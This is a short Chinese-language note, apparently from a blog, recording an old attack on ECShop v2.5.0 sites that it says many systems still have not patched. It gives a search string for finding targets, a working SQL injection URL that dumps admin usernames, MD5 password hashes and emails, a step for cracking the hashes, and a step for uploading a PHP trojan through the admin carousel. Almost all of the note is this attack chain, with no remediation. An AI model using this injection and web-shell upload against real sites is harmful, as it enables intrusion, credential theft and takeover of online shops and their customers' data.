|
很早的一个漏洞,不过现在还有很多系统没有修补,在安全测试中还是有用的。记录一下。
(1)搜索 "Powered by ECShop v2.5.0" (2)直接爆用户密码 user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user/* (3)获取MD5加密后的值,通过在cmd5上进行破解查询。 (4)登陆后台 (5)在首页轮播中上传php的木马 讨论: 如果在上传部分做了限制,估计就比较难了。
|